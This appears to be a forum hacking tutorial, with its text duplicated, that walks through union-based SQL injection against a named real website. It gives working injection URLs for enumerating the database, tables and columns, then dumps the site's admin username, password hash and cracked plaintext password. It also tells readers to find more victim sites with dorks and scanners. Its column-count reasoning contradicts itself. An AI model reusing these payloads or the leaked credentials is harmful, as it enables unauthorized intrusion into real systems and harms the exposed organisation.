Hello , today I will show you how much SQL i Can be Easy : )
Introduction :
What Is SQL i? ( SQL injection )
SQL injection is a basic in Web hacking , and its the first way to debut Exploiting sites .
How To Find SQLi Vuln Sites , & Inject Them :
This is very simple , just use that dorks with a SQLi Scanner , Or Google then check every site by your self .
now to check manually is a site is SQLi vuln , just add ' at the end of the url :
For example , we have our target ,
now , we want to check if the is SQLi vuln , so we add ' at the end :
if we got an error , that means that he is Vuln : )
So , now we move to next Step .
How To Find Columns Count :
after you have your vuln site , u need to know his columns count , to do it , just add "order by X--" at the end of the URL ,
X is a number from 1 to unlimited : d .
For example , we have our target server and we try to count columns ,
we add order by 1-- at the end , then order by 2-- *ect.. , always increase number till u got an error in your website like thise one :
![[Image: 1301868114-2.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u8kHLq5Hrh7sgp4SuOPmi9Gq5qVPNt8R_ClFGBSzuModqDcHUw1sDUl2piEmImU4u2LWKbuUMNc2BCTZ9_izWrWqpriMBUl2IBztqhro0yoNu_KAs=s0-d)
So , in our target server , we have tryed this :
http://www.cocobod.gh/news_details.php?id=30 order by 8-- *>> Unknown column
that means that the 5th column does not exist , that means that column count is 7 : D
How to Find The Acsessable Columns :
Now , we now that column count is 4 , next step is to check for acsessable columns , to do that , we use this querie "UNION SELECT number,of,columns--" like this :
that means that we can get informations from the site from the 6th , the 2nd , and the 3rd column *: D , haha we got the used columns : D .
How To Get MySQL DB Version :
we need to know MySQL DB Version to know if we can exploit this site or not , cox every site that is using MySQL 4.x.x > u can't work on it , but every 5.x.x or above is exploitable : ) .
so to know MySQL DB Vesrion , just replace the number of the used column with "@@version"
for example :
![[Image: 1301869123-4.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tSlI8pKWJiyFBU0Nk4MFr1TMQHCMju-bjJwH8N1SLXrU6s8eKAIihWjbBqzdRZDULmWVe6bSVTjcZfBqNeYmfyxowub8Ztixypd7_3Sw7tO-BQtTM=s0-d)
that means that we can continue working on this site .
How To Find Database Name :
Now , we are going to inject the site to know DB Name ,
to do this , replace the used column number with "group_concat(schema_name)" , and add "from information_schema.schemata--" after the last column number , for example :
![[Image: 1301869671-5.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s9NroB-9QZleCjGDcspmYPIz0bwaeU0peFNBB-0Vf7JclBK__WjCZcW6_Be6u8nKMVozGdNNjBfmxjWtcMmTSoEvYVUZlYAeQE1gn_FYr2sU0uxd0=s0-d)
now , to use the one the website use , replace "group_concat(schema_name)" with "concat(database())" for example :
![[Image: 1301869885-6.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uBWtPO3yGsevMH0QKyU6XPlNnALHC5u6XOTM4L6lANPz86fG8krCJJl9YHg8KXaLL7zZXxQolPZqMPzWVajVGpBi9X8fRVrDqwpLeqF5aNGxrl-Mo=s0-d)
Congratz , you got the used DB : D .
How to Get The Table Names :
Now we need to get Table names , to do this , replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end of columns number .
![[Image: 1301870439-7.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tTuRTHgeoof_5LU1XTFZdDy2U_eg2CCVHUyf2UvwA9lWWV7apYaZ1PbxzHq8DZod3-yvrY6WYD66Q7tzg8nrw0JbGAbK6UhFxYWqxShITEE0hH0A=s0-d)
How To Get Column Names :
To get column names , we will use this queries :
group_concat(column_name)
from information_schema.columns where table_schema=database()--
Example :
![[Image: 1301870776-8.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u-G1ZXtNURC9YY25qdQsA52YIxhsmt5hOEpKP2j2dKjDOTBOIh7i_8mAmIZXcASwKavtyQiFXEMHJ3wrL4_SJ5uSUiQDXlpvH_kjCWDRofGJthd-w=s0-d)
How To Get Informations From Columns :
Now , we are in Our Final Step , now we will get the admin infos from column , How to do it?
Simple , Follow this example :
So our exploit will be like this :
![[Image: 1301871581-9.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vA3PNJOcBwee6s0tVZlphIx_GFOPTmbP2qQA22XhJRk_zdvjxkwoVCV_6qzrNgHZXwbryuUVhFkX_W9Glhl73TaWLn0kSTbWBdts4_qT0aZEp_1rI=s0-d)
now we need to decrypt the password that is crypted in md5 ,
go to http://www.md5decrypter.co.uk/ past your hash , fill the captcha and clic on decrypt , with a little luck , you will get the pass like here : )
![[Image: 1301871757-10.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sJ6VMCfZ97juRKmlfahWMBiSgTwfqVMindgQPWMk-FUX4HRX_GzYugkvvy-501IsOXBo91xT9zieZQ7772HwE-utlivkk5xAdle6pGoe5aGsukyaoU=s0-d)
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682
We have successfully injected a website , and got the admin info
Introduction :
What Is SQL i? ( SQL injection )
SQL injection is a basic in Web hacking , and its the first way to debut Exploiting sites .
How To Find SQLi Vuln Sites , & Inject Them :
This is very simple , just use that dorks with a SQLi Scanner , Or Google then check every site by your self .
now to check manually is a site is SQLi vuln , just add ' at the end of the url :
For example , we have our target ,
Quote:http://www.cocobod.gh/news_details.php?id=30
now , we want to check if the is SQLi vuln , so we add ' at the end :
Quote:http://www.cocobod.gh/news_details.php?id=30'
if we got an error , that means that he is Vuln : )
So , now we move to next Step .
How To Find Columns Count :
after you have your vuln site , u need to know his columns count , to do it , just add "order by X--" at the end of the URL ,
X is a number from 1 to unlimited : d .
For example , we have our target server and we try to count columns ,
we add order by 1-- at the end , then order by 2-- *ect.. , always increase number till u got an error in your website like thise one :
So , in our target server , we have tryed this :
Quote:http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
http://www.cocobod.gh/news_details.php?id=30 order by 8-- *>> Unknown column
that means that the 5th column does not exist , that means that column count is 7 : D
How to Find The Acsessable Columns :
Now , we now that column count is 4 , next step is to check for acsessable columns , to do that , we use this querie "UNION SELECT number,of,columns--" like this :
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--
that means that we can get informations from the site from the 6th , the 2nd , and the 3rd column *: D , haha we got the used columns : D .
How To Get MySQL DB Version :
we need to know MySQL DB Version to know if we can exploit this site or not , cox every site that is using MySQL 4.x.x > u can't work on it , but every 5.x.x or above is exploitable : ) .
so to know MySQL DB Vesrion , just replace the number of the used column with "@@version"
for example :
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--
that means that we can continue working on this site .
How To Find Database Name :
Now , we are going to inject the site to know DB Name ,
to do this , replace the used column number with "group_concat(schema_name)" , and add "from information_schema.schemata--" after the last column number , for example :
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
now , to use the one the website use , replace "group_concat(schema_name)" with "concat(database())" for example :
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Congratz , you got the used DB : D .
How to Get The Table Names :
Now we need to get Table names , to do this , replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end of columns number .
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
How To Get Column Names :
To get column names , we will use this queries :
group_concat(column_name)
from information_schema.columns where table_schema=database()--
Example :
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
How To Get Informations From Columns :
Now , we are in Our Final Step , now we will get the admin infos from column , How to do it?
Simple , Follow this example :
Quote:http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
So our exploit will be like this :
Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
now we need to decrypt the password that is crypted in md5 ,
go to http://www.md5decrypter.co.uk/ past your hash , fill the captcha and clic on decrypt , with a little luck , you will get the pass like here : )
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682
We have successfully injected a website , and got the admin info






